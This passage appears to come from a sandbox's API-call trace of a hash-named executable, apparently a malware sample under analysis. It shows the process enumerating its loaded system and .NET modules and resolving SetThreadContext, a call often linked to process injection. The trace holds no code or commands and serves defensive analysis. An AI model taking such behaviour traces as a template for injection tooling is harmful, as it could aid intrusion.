lpmodinfo=0x2543044, cb=0xc | out: lpmodinfo=0x2543044*(lpBaseOfDll=0x74eb0000, SizeOfImage=0x13ff000, EntryPoint=0x7506b990)) returned 1 [0108.939] CoTaskMemAlloc (cb=0x804) returned 0x6b7648 [0108.939] GetModuleBaseNameW (in: hProcess=0x32c, hModule=0x74eb0000, lpBaseName=0x6b7648, nSize=0x800 | out: lpBaseName="shell32.dll") returned 0xb [0108.940] CoTaskMemFree (pv=0x6b7648) [0108.940] CoTaskMemAlloc (cb=0x804) returned 0x6b7648 [0108.940] GetModuleFileNameExW (in: hProcess=0x32c, hModule=0x74eb0000, lpFilename=0x6b7648, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\shell32.dll" (normalized: "c:\\windows\\syswow64\\shell32.dll")) returned 0x1f [0108.940] CoTaskMemFree (pv=0x6b7648) [0108.940] GetModuleInformation (in: hProcess=0x32c, hModule=0x76800000, lpmodinfo=0x254525c, cb=0xc | out: lpmodinfo=0x254525c*(lpBaseOfDll=0x76800000, SizeOfImage=0x37000, EntryPoint=0x76803b50)) returned 1 [0108.941] CoTaskMemAlloc (cb=0x804) returned 0x6b7648 [0108.941] GetModuleBaseNameW (in: hProcess=0x32c, hModule=0x76800000, lpBaseName=0x6b7648, nSize=0x800 | out: lpBaseName="cfgmgr32.dll") returned 0xc [0108.942] CoTaskMemFree (pv=0x6b7648) [0108.942] CoTaskMemAlloc (cb=0x804) returned 0x6b7648 [0108.942] GetModuleFileNameExW (in: hProcess=0x32c, hModule=0x76800000, lpFilename=0x6b7648, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\cfgmgr32.dll" (normalized: "c:\\windows\\syswow64\\cfgmgr32.dll")) returned 0x20 [0108.950] CoTaskMemFree (pv=0x6b7648) [0108.950] GetModuleInformation (in: hProcess=0x32c, hModule=0x745b0000, lpmodinfo=0x2547370, cb=0xc | out: lpmodinfo=0x2547370*(lpBaseOfDll=0x745b0000, SizeOfImage=0x4f9000, EntryPoint=0x747b7610)) returned 1 [0108.951] CoTaskMemAlloc (cb=0x804) returned 0x6b7648 [0108.951] GetModuleBaseNameW (in: hProcess=0x32c, hModule=0x745b0000, lpBaseName=0x6b7648, nSize=0x800 | out: lpBaseName="windows.storage.dll") returned 0x13 [0108.952] CoTaskMemFree (pv=0x6b7648) [0108.952] CoTaskMemAlloc (cb=0x804) returned 0x6b7648 [0108.952] GetModuleFileNameExW (in: hProcess=0x32c, hModule=0x745b0000, lpFilename=0x6b7648, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\windows.storage.dll" (normalized: "c:\\windows\\syswow64\\windows.storage.dll")) returned 0x27 [0108.952] CoTaskMemFree (pv=0x6b7648) [0108.953] GetModuleInformation (in: hProcess=0x32c, hModule=0x74520000, lpmodinfo=0x254949c, cb=0xc | out: lpmodinfo=0x254949c*(lpBaseOfDll=0x74520000, SizeOfImage=0x8d000, EntryPoint=0x74569b90)) returned 1 [0108.953] CoTaskMemAlloc (cb=0x804) returned 0x6b7648 [0108.953] GetModuleBaseNameW (in: hProcess=0x32c, hModule=0x74520000, lpBaseName=0x6b7648, nSize=0x800 | out: lpBaseName="shcore.dll") returned 0xa [0108.954] CoTaskMemFree (pv=0x6b7648) [0108.954] CoTaskMemAlloc (cb=0x804) returned 0x6b7648 [0108.954] GetModuleFileNameExW (in: hProcess=0x32c, hModule=0x74520000, lpFilename=0x6b7648, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\shcore.dll" (normalized: "c:\\windows\\syswow64\\shcore.dll")) returned 0x1e [0108.955] CoTaskMemFree (pv=0x6b7648) [0108.955] GetModuleInformation (in: hProcess=0x32c, hModule=0x76470000, lpmodinfo=0x254b5a8, cb=0xc | out: lpmodinfo=0x254b5a8*(lpBaseOfDll=0x76470000, SizeOfImage=0x44000, EntryPoint=0x76477410)) returned 1 [0108.956] CoTaskMemAlloc (cb=0x804) returned 0x6b7648 [0108.956] GetModuleBaseNameW (in: hProcess=0x32c, hModule=0x76470000, lpBaseName=0x6b7648, nSize=0x800 | out: lpBaseName="powrprof.dll") returned 0xc [0108.956] CoTaskMemFree (pv=0x6b7648) [0108.956] CoTaskMemAlloc (cb=0x804) returned 0x6b7648 [0108.956] GetModuleFileNameExW (in: hProcess=0x32c, hModule=0x76470000, lpFilename=0x6b7648, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\powrprof.dll" (normalized: "c:\\windows\\syswow64\\powrprof.dll")) returned 0x20 [0108.957] CoTaskMemFree (pv=0x6b7648) [0108.957] GetModuleInformation (in: hProcess=0x32c, hModule=0x73f20000, lpmodinfo=0x254d6bc, cb=0xc | out: lpmodinfo=0x254d6bc*(lpBaseOfDll=0x73f20000, SizeOfImage=0xf000, EntryPoint=0x73f22e40)) returned 1 [0108.958] CoTaskMemAlloc (cb=0x804) returned 0x6b7648 [0108.958] GetModuleBaseNameW (in: hProcess=0x32c, hModule=0x73f20000, lpBaseName=0x6b7648, nSize=0x800 | out: lpBaseName="profapi.dll") returned 0xb [0108.959] CoTaskMemFree (pv=0x6b7648) [0108.959] CoTaskMemAlloc (cb=0x804) returned 0x6b7648 [0108.959] GetModuleFileNameExW (in: hProcess=0x32c, hModule=0x73f20000, lpFilename=0x6b7648, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\profapi.dll" (normalized: "c:\\windows\\syswow64\\profapi.dll")) returned 0x1f [0108.960] CoTaskMemFree (pv=0x6b7648) [0108.960] CloseHandle (hObject=0x32c) returned 1 [0108.961] GetProcAddress (hModule=0x76720000, lpProcName="SetThreadContext") returned 0x76762490 [0108.962] GetCurrentProcessId () returned 0x139c [0108.962] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x139c) returned 0x32c [0108.962] EnumProcessModules (in: hProcess=0x32c, lphModule=0x25518ac, cb=0x100, lpcbNeeded=0x19eae0 | out: lphModule=0x25518ac, lpcbNeeded=0x19eae0) returned 1 [0108.963] GetModuleInformation (in: hProcess=0x32c, hModule=0x400000, lpmodinfo=0x25519ec, cb=0xc | out: lpmodinfo=0x25519ec*(lpBaseOfDll=0x400000, SizeOfImage=0x178000, EntryPoint=0x0)) returned 1 [0108.963] CoTaskMemAlloc (cb=0x804) returned 0x6b7af0 [0108.963] GetModuleBaseNameW (in: hProcess=0x32c, hModule=0x400000, lpBaseName=0x6b7af0, nSize=0x800 | out: lpBaseName="08b3772f35997a0eb0894e7e58b4a324324de6121f557976909bdaa31a2c883e.exe") returned 0x44 [0108.963] CoTaskMemFree (pv=0x6b7af0) [0108.963] CoTaskMemAlloc (cb=0x804) returned 0x6b7af0 [0108.963] GetModuleFileNameExW (in: hProcess=0x32c, hModule=0x400000, lpFilename=0x6b7af0, nSize=0x800 | out: lpFilename="C:\\Users\\RDhJ0CNFevzX\\Desktop\\08b3772f35997a0eb0894e7e58b4a324324de6121f557976909bdaa31a2c883e.exe" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\08b3772f35997a0eb0894e7e58b4a324324de6121f557976909bdaa31a2c883e.exe")) returned 0x62 [0108.963] CoTaskMemFree (pv=0x6b7af0) [0108.963] GetModuleInformation (in: hProcess=0x32c, hModule=0x771d0000, lpmodinfo=0x2553c10, cb=0xc | out: lpmodinfo=0x2553c10*(lpBaseOfDll=0x771d0000, SizeOfImage=0x17b000, EntryPoint=0x0)) returned 1 [0108.964] CoTaskMemAlloc (cb=0x804) returned 0x6b7af0 [0108.964] GetModuleBaseNameW (in: hProcess=0x32c, hModule=0x771d0000, lpBaseName=0x6b7af0, nSize=0x800 | out: lpBaseName="ntdll.dll") returned 0x9 [0108.964] CoTaskMemFree (pv=0x6b7af0) [0108.964] CoTaskMemAlloc (cb=0x804) returned 0x6b7af0 [0108.964] GetModuleFileNameExW (in: hProcess=0x32c, hModule=0x771d0000, lpFilename=0x6b7af0, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll")) returned 0x1d [0108.964] CoTaskMemFree (pv=0x6b7af0) [0108.964] GetModuleInformation (in: hProcess=0x32c, hModule=0x6f8b0000, lpmodinfo=0x2555d14, cb=0xc | out: lpmodinfo=0x2555d14*(lpBaseOfDll=0x6f8b0000, SizeOfImage=0x59000, EntryPoint=0x6f8c0780)) returned 1 [0108.964] CoTaskMemAlloc (cb=0x804) returned 0x6b7af0 [0108.964] GetModuleBaseNameW (in: hProcess=0x32c, hModule=0x6f8b0000, lpBaseName=0x6b7af0, nSize=0x800 | out: lpBaseName="MSCOREE.DLL") returned 0xb [0108.965] CoTaskMemFree (pv=0x6b7af0) [0108.965] CoTaskMemAlloc (cb=0x804) returned 0x6b7af0 [0108.965] GetModuleFileNameExW (in: hProcess=0x32c, hModule=0x6f8b0000, lpFilename=0x6b7af0, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\MSCOREE.DLL" (normalized: "c:\\windows\\syswow64\\mscoree.dll")) returned 0x1f [0108.965] CoTaskMemFree (pv=0x6b7af0) [0108.965] GetModuleInformation (in: hProcess=0x32c, hModule=0x76720000, lpmodinfo=0x2557e20, cb=0xc | out: lpmodinfo=0x2557e20*(lpBaseOfDll=0x76720000, SizeOfImage=0xe0000, EntryPoint=0x76733980)) returned 1 [0108.965] CoTaskMemAlloc (cb=0x804) returned 0x6b7af0 [0108.965] GetModuleBaseNameW (in: hProcess=0x32c, hModule=0x76720000, lpBaseName=0x6b7af0, nSize=0x800 | out: lpBaseName="KERNEL32.dll") returned 0xc [0108.965] CoTaskMemFree (pv=0x6b7af0) [0108.965] CoTaskMemAlloc (cb=0x804) returned 0x6b7af0 [0108.965] GetModuleFileNameExW (in: hProcess=0x32c, hModule=0x76720000, lpFilename=0x6b7af0, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\KERNEL32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll")) returned 0x20 [0108.966] CoTaskMemFree (pv=0x6b7af0) [0108.966] GetModuleInformation (in: hProcess=0x32c, hModule=0x76910000, lpmodinfo=0x2559f34, cb=0xc | out: lpmodinfo=0x2559f34*(lpBaseOfDll=0x76910000, SizeOfImage=0x17e000, EntryPoint=0x769c1b90)) returned 1 [0108.966] CoTaskMemAlloc (cb=0x804) returned 0x6b7af0 [0108.966] GetModuleBaseNameW (in: hProcess=0x32c, hModule=0x76910000, lpBaseName=0x6b7af0, nSize=0x800 | out: lpBaseName="KERNELBASE.dll") returned 0xe [0108.966] CoTaskMemFree (pv=0x6b7af0) [0108.966] CoTaskMemAlloc (cb=0x804) returned 0x6b7af0 [0108.966] GetModuleFileNameExW (in: hProcess=0x32c, hModule=0x76910000, lpFilename=0x6b7af0, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\KERNELBASE.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll")) returned 0x22 [0108.966] CoTaskMemFree (pv=0x6b7af0) [0108.966] GetModuleInformation (in: hProcess=0x32c, hModule=0x73e50000, lpmodinfo=0x255c07c, cb=0xc | out: lpmodinfo=0x255c07c*(lpBaseOfDll=0x73e50000, SizeOfImage=0x92000, EntryPoint=0x73e90380)) returned 1 [0108.967] CoTaskMemAlloc (cb=0x804) returned 0x6b7af0 [0108.967] GetModuleBaseNameW (in: hProcess=0x32c, hModule=0x73e50000, lpBaseName=0x6b7af0, nSize=0x800 | out: lpBaseName="apphelp.dll") returned 0xb [0108.967] CoTaskMemFree (pv=0x6b7af0) [0108.967] CoTaskMemAlloc (cb=0x804) returned 0x6b7af0 [0108.967] GetModuleFileNameExW (in: hProcess=0x32c, hModule=0x73e50000, lpFilename=0x6b7af0, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\apphelp.dll" (normalized: "c:\\windows\\syswow64\\apphelp.dll")) returned 0x1f [0108.967] CoTaskMemFree (pv=0x6b7af0) [0108.967] GetModuleInformation (in: hProcess=0x32c, hModule=0x76600000, lpmodinfo=0x255e188, cb=0xc | out: lpmodinfo=0x255e188*(lpBaseOfDll=0x76600000, SizeOfImage=0x7b000, EntryPoint=0x7661e970)) returned 1 [0108.967] CoTaskMemAlloc (cb=0x804) returned 0x6b7af0 [0108.967] GetModuleBaseNameW (in: hProcess=0x32c, hModule=0x76600000, lpBaseName=0x6b7af0, nSize=0x800 | out: lpBaseName="ADVAPI32.dll") returned 0xc [0108.968] CoTaskMemFree (pv=0x6b7af0) [0108.968] CoTaskMemAlloc (cb=0x804) returned 0x6b7af0 [0108.968] GetModuleFileNameExW (in: hProcess=0x32c, hModule=0x76600000, lpFilename=0x6b7af0, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\ADVAPI32.dll" (normalized: "c:\\windows\\syswow64\\advapi32.dll")) returned 0x20 [0108.968] CoTaskMemFree (pv=0x6b7af0) [0108.968] GetModuleInformation (in: hProcess=0x32c, hModule=0x76a90000, lpmodinfo=0x256029c, cb=0xc | out: lpmodinfo=0x256029c*(lpBaseOfDll=0x76a90000, SizeOfImage=0xbe000, EntryPoint=0x76ac5630)) returned 1 [0108.968] CoTaskMemAlloc (cb=0x804) returned 0x6b7af0 [0108.968] GetModuleBaseNameW (in: hProcess=0x32c, hModule=0x76a90000, lpBaseName=0x6b7af0, nSize=0x800 | out: lpBaseName="msvcrt.dll") returned 0xa [0108.969] CoTaskMemFree (pv=0x6b7af0) [0108.969] CoTaskMemAlloc (cb=0x804) returned 0x6b7af0 [0108.969] GetModuleFileNameExW (in: hProcess=0x32c, hModule=0x76a90000, lpFilename=0x6b7af0, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll")) returned 0x1e [0108.969] CoTaskMemFree (pv=0x6b7af0) [0108.969] GetModuleInformation (in: hProcess=0x32c, hModule=0x76cb0000, lpmodinfo=0x25623a8, cb=0xc | out: lpmodinfo=0x25623a8*(lpBaseOfDll=0x76cb0000, SizeOfImage=0x44000, EntryPoint=0x76cc9d80)) returned 1 [0108.969] CoTaskMemAlloc (cb=0x804) returned 0x6b7af0 [0108.969] GetModuleBaseNameW (in: hProcess=0x32c, hModule=0x76cb0000, lpBaseName=0x6b7af0, nSize=0x800 | out: lpBaseName="sechost.dll") returned 0xb [0108.970] CoTaskMemFree (pv=0x6b7af0) [0108.970] CoTaskMemAlloc (cb=0x804) returned 0x6b7af0 [0108.970] GetModuleFileNameExW (in: hProcess=0x32c, hModule=0x76cb0000, lpFilename=0x6b7af0, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\sechost.dll" (normalized: "c:\\windows\\syswow64\\sechost.dll")) returned 0x1f [0108.970] CoTaskMemFree (pv=0x6b7af0) [0108.970] GetModuleInformation (in: hProcess=0x32c, hModule=0x76c00000, lpmodinfo=0x2564500, cb=0xc | out: lpmodinfo=0x2564500*(lpBaseOfDll=0x76c00000, SizeOfImage=0xad000, EntryPoint=0x76c14f00)) returned 1 [0108.970] CoTaskMemAlloc (cb=0x804) returned 0x6b7af0 [0108.970] GetModuleBaseNameW (in: hProcess=0x32c, hModule=0x76c00000, lpBaseName=0x6b7af0, nSize=0x800 | out: lpBaseName="RPCRT4.dll") returned 0xa [0108.971] CoTaskMemFree (pv=0x6b7af0) [0108.971] CoTaskMemAlloc (cb=0x804) returned 0x6b7af0 [0108.971] GetModuleFileNameExW (in: hProcess=0x32c, hModule=0x76c00000, lpFilename=0x6b7af0, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\RPCRT4.dll" (normalized: "c:\\windows\\syswow64\\rpcrt4.dll")) returned 0x1e [0108.971] CoTaskMemFree (pv=0x6b7af0) [0108.971] GetModuleInformation (in: hProcess=0x32c, hModule=0x73f00000, lpmodinfo=0x256660c, cb=0xc | out: lpmodinfo=0x256660c*(lpBaseOfDll=0x73f00000, SizeOfImage=0x1e000, EntryPoint=0x73f0b640)) returned 1 [0108.971] CoTaskMemAlloc (cb=0x804) returned 0x6b7af0 [0108.971] GetModuleBaseNameW (in: hProcess=0x32c, hModule=0x73f00000, lpBaseName=0x6b7af0, nSize=0x800 | out: lpBaseName="SspiCli.dll") returned 0xb [0108.972] CoTaskMemFree (pv=0x6b7af0) [0108.972] GetModuleFileNameExW (in: hProcess=0x32c, hModule=0x73f00000, lpFilename=0x6b7af0, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\SspiCli.dll" (normalized: "c:\\windows\\syswow64\\sspicli.dll")) returned 0x1f [0108.972] GetModuleInformation (in: hProcess=0x32c, hModule=0x73ef0000, lpmodinfo=0x2568718, cb=0xc | out: lpmodinfo=0x2568718*(lpBaseOfDll=0x73ef0000, SizeOfImage=0xa000, EntryPoint=0x73ef2a00)) returned 1 [0108.973] GetModuleBaseNameW (in: hProcess=0x32c, hModule=0x73ef0000, lpBaseName=0x6b7af0, nSize=0x800 | out: lpBaseName="CRYPTBASE.dll") returned 0xd [0108.973] GetModuleFileNameExW (in: hProcess=0x32c, hModule=0x73ef0000, lpFilename=0x6b7af0, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\CRYPTBASE.dll" (normalized: "c:\\windows\\syswow64\\cryptbase.dll")) returned 0x21 [0108.973] GetModuleInformation (in: hProcess=0x32c, hModule=0x76840000, lpmodinfo=0x256a82c, cb=0xc | out: lpmodinfo=0x256a82c*(lpBaseOfDll=0x76840000, SizeOfImage=0x58000, EntryPoint=0x768825c0)) returned 1 [0108.975] GetModuleBaseNameW (in: hProcess=0x32c, hModule=0x76840000, lpBaseName=0x6b7af0, nSize=0x800 | out: lpBaseName="bcryptPrimitives.dll") returned 0x14 [0108.975] GetModuleFileNameExW (in: hProcess=0x32c, hModule=0x76840000, lpFilename=0x6b7af0, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\bcryptPrimitives.dll" (normalized: "c:\\windows\\syswow64\\bcryptprimitives.dll")) returned 0x28 [0108.975] GetModuleInformation (in: hProcess=0x32c, hModule=0x6f910000, lpmodinfo=0x256c960, cb=0xc | out: lpmodinfo=0x256c960*(lpBaseOfDll=0x6f910000, SizeOfImage=0x7d000, EntryPoint=0x6f920db0)) returned 1 [0108.976] GetModuleBaseNameW (in: hProcess=0x32c, hModule=0x6f910000, lpBaseName=0x6b7af0, nSize=0x800 | out: lpBaseName="mscoreei.dll") returned 0xc [0108.976] GetModuleFileNameExW (in: hProcess=0x32c, hModule=0x6f910000, lpFilename=0x6b7af0, nSize=0x800 | out: lpFilename="C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscoreei.dll" (normalized: "c:\\windows\\microsoft.net\\framework\\v4.0.30319\\mscoreei.dll")) returned 0x3a [0108.977] GetModuleInformation (in: hProcess=0x32c, hModule=0x76d00000, lpmodinfo=0x256eaa8, cb=0xc | out: lpmodinfo=0x256eaa8*(lpBaseOfDll=0x76d00000, SizeOfImage=0x45000, EntryPoint=0x76d1de90)) returned 1 [0108.977] GetModuleBaseNameW (in: hProcess=0x32c, hModule=0x76d00000, lpBaseName=0x6b7af0, nSize=0x800 | out: lpBaseName="SHLWAPI.dll") returned 0xb [0108.977] GetModuleFileNameExW (in: hProcess=0x32c, hModule=0x76d00000, lpFilename=0x6b7af0, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\SHLWAPI.dll" (normalized: "c:\\windows\\syswow64\\shlwapi.dll")) returned 0x1f [0108.978] GetModuleInformation (in: hProcess=0x32c, hModule=0x762b0000, lpmodinfo=0x2570bb4, cb=0xc | out: lpmodinfo=0x2570bb4*(lpBaseOfDll=0x762b0000, SizeOfImage=0x1bd000, EntryPoint=0x76392a10)) returned 1 [0108.978] GetModuleBaseNameW (in: hProcess=0x32c, hModule=0x762b0000, lpBaseName=0x6b7af0, nSize=0x800 | out: lpBaseName="combase.dll") returned 0xb [0108.980] GetModuleFileNameExW (in: hProcess=0x32c, hModule=0x762b0000, lpFilename=0x6b7af0, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\combase.dll" (normalized: "c:\\windows\\syswow64\\combase.dll")) returned 0x1f [0108.980] GetModuleInformation (in: hProcess=0x32c, hModule=0x74ab0000, lpmodinfo=0x2572cc0, cb=0xc | out: lpmodinfo=0x2572cc0*(lpBaseOfDll=0x74ab0000, SizeOfImage=0x14f000, EntryPoint=0x74b66820)) returned 1 [0108.981] GetModuleBaseNameW (in: hProcess=0x32c, hModule=0x74ab0000, lpBaseName=0x6b7af0, nSize=0x800 | out: lpBaseName="GDI32.dll") returned 0x9 [0108.981] GetModuleFileNameExW (in: hProcess=0x32c, hModule=0x74ab0000, lpFilename=0x6b7af0, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\GDI32.dll" (normalized: "c:\\windows\\syswow64\\gdi32.dll")) returned 0x1d [0108.982] GetModuleInformation (in: hProcess=0x32c, hModule=0x743d0000, lpmodinfo=0x2574e50, cb=0xc | out: lpmodinfo=0x2574e50*(lpBaseOfDll=0x743d0000, SizeOfImage=0x147000, EntryPoint=0x743e1cf0)) returned 1 [0108.982] GetModuleBaseNameW (in: hProcess=0x32c, hModule=0x743d0000, lpBaseName=0x6b7af0, nSize=0x800 | out: lpBaseName="USER32.dll") returned 0xa [0108.983] GetModuleFileNameExW (in: hProcess=0x32c, hModule=0x743d0000, lpFilename=0x6b7af0, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\USER32.dll" (normalized: "c:\\windows\\syswow64\\user32.dll")) returned 0x1e [0108.983] GetModuleInformation (in: hProcess=0x32c, hModule=0x741b0000, lpmodinfo=0x2576f5c, cb=0xc | out: lpmodinfo=0x2576f5c*(lpBaseOfDll=0x741b0000, SizeOfImage=0x2b000, EntryPoint=0x741b5680)) returned 1 [0108.984] GetModuleBaseNameW (in: hProcess=0x32c, hModule=0x741b0000, lpBaseName=0x6b7af0, nSize=0x800 | out: lpBaseName="IMM32.DLL") returned 0x9 [0108.984] GetModuleFileNameExW (in: hProcess=0x32c, hModule=0x741b0000, lpFilename=0x6b7af0, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\IMM32.DLL" (normalized: "c:\\windows\\syswow64\\imm32.dll")) returned 0x1d [0108.985] GetModuleInformation (in: hProcess=0x32c, hModule=0x76d50000, lpmodinfo=0x2579060, cb=0xc | out: lpmodinfo=0x2579060*(lpBaseOfDll=0x76d50000, SizeOfImage=0xc000, EntryPoint=0x76d53930)) returned 1 [0108.985] GetModuleBaseNameW (in: hProcess=0x32c, hModule=0x76d50000, lpBaseName=0x6b7af0, nSize=0x800 | out: lpBaseName="kernel.appcore.dll") returned 0x12 [0108.986] GetModuleFileNameExW (in: hProcess=0x32c, hModule=0x76d50000, lpFilename=0x6b7af0, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\kernel.appcore.dll" (normalized: "c:\\windows\\syswow64\\kernel.appcore.dll")) returned 0x26 [0108.986] GetModuleInformation (in: hProcess=0x32c, hModule=0x6f8a0000, lpmodinfo=0x257b18c, cb=0xc | out: lpmodinfo=0x257b18c*(lpBaseOfDll=0x6f8a0000, SizeOfImage=0x8000, EntryPoint=0x6f8a17b0)) returned 1 [0108.987] GetModuleBaseNameW (in: hProcess=0x32c, hModule=0x6f8a0000, lpBaseName=0x6b7af0, nSize=0x800 | out: lpBaseName="VERSION.dll") returned 0xb [0108.988] GetModuleFileNameExW (in: hProcess=0x32c, hModule=0x6f8a0000, lpFilename=0x6b7af0, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\VERSION.dll" (normalized: "c:\\windows\\syswow64\\version.dll")) returned 0x1f [0108.988] GetModuleInformation (in: hProcess=0x32c, hModule=0x6f1b0000, lpmodinfo=0x257d298, cb=0xc | out: lpmodinfo=0x257d298*(lpBaseOfDll=0x6f1b0000, SizeOfImage=0x6e1000, EntryPoint=0x6f1dcd70)) returned 1 [0108.989] GetModuleBaseNameW (in: hProcess=0x32c, hModule=0x6f1b0000, lpBaseName=0x6b7af0, nSize=0x800 | out: lpBaseName="clr.dll") returned 0x7 [0108.996] GetModuleFileNameExW (in: hProcess=0x32c, hModule=0x6f1b0000, lpFilename=0x6b7af0, nSize=0x800 | out: lpFilename="C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\clr.dll" (normalized: "c:\\windows\\microsoft.net\\framework\\v4.0.30319\\clr.dll")) returned 0x35 [0108.997] GetModuleInformation (in: hProcess=0x32c, hModule=0x6f0b0000, lpmodinfo=0x257f3c8, cb=0xc | out: lpmodinfo=0x257f3c8*(lpBaseOfDll=0x6f0b0000, SizeOfImage=0xf5000, EntryPoint=0x6f104160)) returned 1 [0108.997] GetModuleBaseNameW (in: hProcess=0x32c, hModule=0x6f0b0000, lpBaseName=0x6b7af0, nSize=0x800 | out: lpBaseName="MSVCR120_CLR0400.dll") returned 0x14 [0108.998] GetModuleFileNameExW (in: hProcess=0x32c, hModule=0x6f0b0000, lpFilename=0x6b7af0, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\MSVCR120_CLR0400.dll" (normalized: "c:\\windows\\syswow64\\msvcr120_clr0400.dll")) returned 0x28 [0108.998] GetModuleInformation (in: hProcess=0x32c, hModule=0x6d400000, lpmodinfo=0x25814fc, cb=0xc | out: lpmodinfo=0x25814fc*(lpBaseOfDll=0x6d400000, SizeOfImage=0x12b2000, EntryPoint=0x0)) returned 1 [0108.999] GetModuleBaseNameW (in: hProcess=0x32c, hModule=0x6d400000, lpBaseName=0x6b7af0, nSize=0x800 | out: lpBaseName="mscorlib.ni.dll") returned 0xf [0109.000] GetModuleFileNameExW (in: hProcess=0x32c, hModule=0x6d400000, lpFilename=0x6b7af0, nSize=0x800 | out: lpFilename="C:\\Windows\\assembly\\NativeImages_v4.0.30319_32\\mscorlib\\7582400666d289c016013ad0f6e0e3e6\\mscorlib.ni.dll" (normalized: "c:\\windows\\assembly\\nativeimages_v4.0.30319_32\\mscorlib\\7582400666d289c016013ad0f6e0e3e6\\mscorlib.ni.dll")) returned 0x68 [0109.001] GetModuleInformation (in: hProcess=0x32c, hModule=0x74dc0000, lpmodinfo=0x25836a4, cb=0xc | out: lpmodinfo=0x25836a4*(lpBaseOfDll=0x74dc0000, SizeOfImage=0xeb000, EntryPoint=0x74dfd650)) returned 1 [0109.001] GetModuleBaseNameW (in: hProcess=0x32c, hModule=0x74dc0000, lpBaseName=0x6b7af0, nSize=0x800 | out: lpBaseName="ole32.dll") returned 0x9 [0109.002] GetModuleFileNameExW (in: hProcess=0x32c, hModule=0x74dc0000, lpFilename=0x6b7af0, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\ole32.dll" (normalized: "c:\\windows\\syswow64\\ole32.dll")) returned 0x1d [0109.003] GetModuleInformation (in: hProcess=0x32c, hModule=0x6f030000, lpmodinfo=0x25857a8, cb=0xc | out: lpmodinfo=0x25857a8*(lpBaseOfDll=0x6f030000, SizeOfImage=0x80000, EntryPoint=0x6f031180)) returned 1 [0109.003] GetModuleBaseNameW (in: hProcess=0x32c, hModule=0x6f030000, lpBaseName=0x6b7af0, nSize=0x800 | out: lpBaseName="clrjit.dll") returned 0xa [0109.004] GetModuleFileNameExW (in: hProcess=0x32c, hModule=0x6f030000, lpFilename=0x6b7af0, nSize=0x800 | out: lpFilename="C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\clrjit.dll" (normalized: "c:\\windows\\microsoft.net\\framework\\v4.0.30319\\clrjit.dll")) returned 0x38 [0109.004] GetModuleInformation (in: hProcess=0x32c, hModule=0x76680000, lpmodinfo=0x25878e8, cb=0xc | out: lpmodinfo=0x25878e8*(lpBaseOfDll=0x76680000, SizeOfImage=0x92000, EntryPoint=0x766b8cf0)) returned 1 [0109.005] GetModuleBaseNameW (in: hProcess=0x32c, hModule=0x76680000, lpBaseName=0x6b7af0, nSize=0x800 | out: lpBaseName="OLEAUT32.dll") returned 0xc [0109.006] GetModuleFileNameExW (in: hProcess=0x32c, hModule=0x76680000, lpFilename=0x6b7af0, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\OLEAUT32.dll" (normalized: "c:\\windows\\syswow64\\oleaut32.dll")) returned 0x20 [0109.006] GetModuleInformation (in: hProcess=0x32c, hModule=0x6ca30000, lpmodinfo=0x25899fc, cb=0xc | out: lpmodinfo=0x25899fc*(lpBaseOfDll=0x6ca30000, SizeOfImage=0x9cc000, EntryPoint=0x0)) returned 1 [0109.007] GetModuleBaseNameW (in: hProcess=0x32c, hModule=0x6ca30000, lpBaseName=0x6b7af0, nSize=0x800 | out: lpBaseName="System.ni.dll") returned 0xd [0109.008] GetModuleFileNameExW (in: hProcess=0x32c, hModule=0x6ca30000, lpFilename=0x6b7af0, nSize=0x800 | out: lpFilename="C:\\Windows\\assembly\\NativeImages_v4.0.30319_32\\System\\1be7a15b1f33bf22e4f53aaf45518c77\\System.ni.dll" (normalized: "c:\\windows\\assembly\\nativeimages_v4.0.30319_32\\system\\1be7a15b1f33bf22e4f53aaf45518c77\\system.ni.dll")) returned 0x64 [0109.008] GetModuleInformation (in: hProcess=0x32c, hModule=0x6e900000, lpmodinfo=0x258bb98, cb=0xc | out: lpmodinfo=0x258bb98*(lpBaseOfDll=0x6e900000, SizeOfImage=0x721000, EntryPoint=0x0)) returned 1 [0109.009] GetModuleBaseNameW (in: hProcess=0x32c, hModule=0x6e900000, lpBaseName=0x6b7af0, nSize=0x800 | out: lpBaseName="System.Core.ni.dll") returned 0x12 [0109.009] GetModuleFileNameExW (in: hProcess=0x32c, hModule=0x6e900000, lpFilename=0x6b7af0, nSize=0x800 | out: 